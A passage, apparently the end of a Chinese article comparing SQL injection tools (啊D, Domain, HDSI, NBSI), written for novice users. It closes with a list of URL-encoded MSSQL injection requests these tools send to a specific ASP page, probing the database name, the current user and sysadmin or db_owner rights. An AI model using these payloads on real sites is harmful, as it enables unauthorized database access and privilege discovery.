SQL注入工具大比拼

核心提示： 7.Domain在这里抓个图给大家看，至于评点，SQL注入工具大比拼(6)，呵呵……它和啊D很像，你们看我对啊D的评点吧！另外通过那张测试表，最后把NBSI和HDSI对于确定服务器信息的几行重要的提交代码在这里公布一下，希望软件编程人员能从中总结点什么：HDSI

7.Domain

在这里抓个图给大家看，至于评点，呵呵……它和啊D很像，你们看我对啊D的评点吧！另外通过那张测试表，你们也应该能对比出点什么。

总结

其实注入也是门学问，即使我们用工具也会长不少见识。

看出什么了么？对了！它的name字段并不是有用的数据，有用的数据在应该为表示序列的uid中。这次检测WED和CSC就是因为暴的是name字段，所以最终以失败而告终。而用啊D等工具的朋友是不是也会在没有去暴uid时面对那奇怪的name而发楞呢？是啊！人的思想是奇妙的，希望读者能从本文中读到文章中没有的东西，呵呵。

最后把NBSI和HDSI对于确定服务器信息的几行重要的提交代码在这里公布一下，希望软件编程人员能从中总结点什么：

HDSI
/rules/viewrules.asp?id=43;create%20table%20t_jiaozhu(jiaozhu%20varchar(200))
/rules/viewrules.asp?id=43%20and(char(94)%2Bdb_name()%2Bchar(94))>0
/rules/viewrules.asp?id=43;declare%20@a%20int--
/rules/viewrules.asp?id=43%20And%20Cast(IS_SRVROLEMEMBER('sysadmin')%20as%20varchar(1))=1
/rules/viewrules.asp?id=43%20And%20char(94)%2Buser%2Bchar(94)=0
/rules/viewrules.asp?id=43%20And%20char(94)%2Bdb_name()%2Bchar(94)=0
NBSI
/rules/viewrules.asp?id=43
/rules/viewrules.asp?id=43%20and%20user%2Bchar(124)=0
/rules/viewrules.asp?id=43;declare%20@a%20int--
/rules/viewrules.asp?id=43%20and%20(Select%20count(1)%20from%20[sysobjects])>=0
/rules/viewrules.asp?id=43%20And%20user%2Bchar(124)=0
/rules/viewrules.asp?id=43%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1
/rules/viewrules.asp?id=43%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1
/rules/viewrules.asp?id=43%20And%20db_name()%2Bchar(124)=0

好了，文章写完了，希望能为广大新手朋友带来一些帮助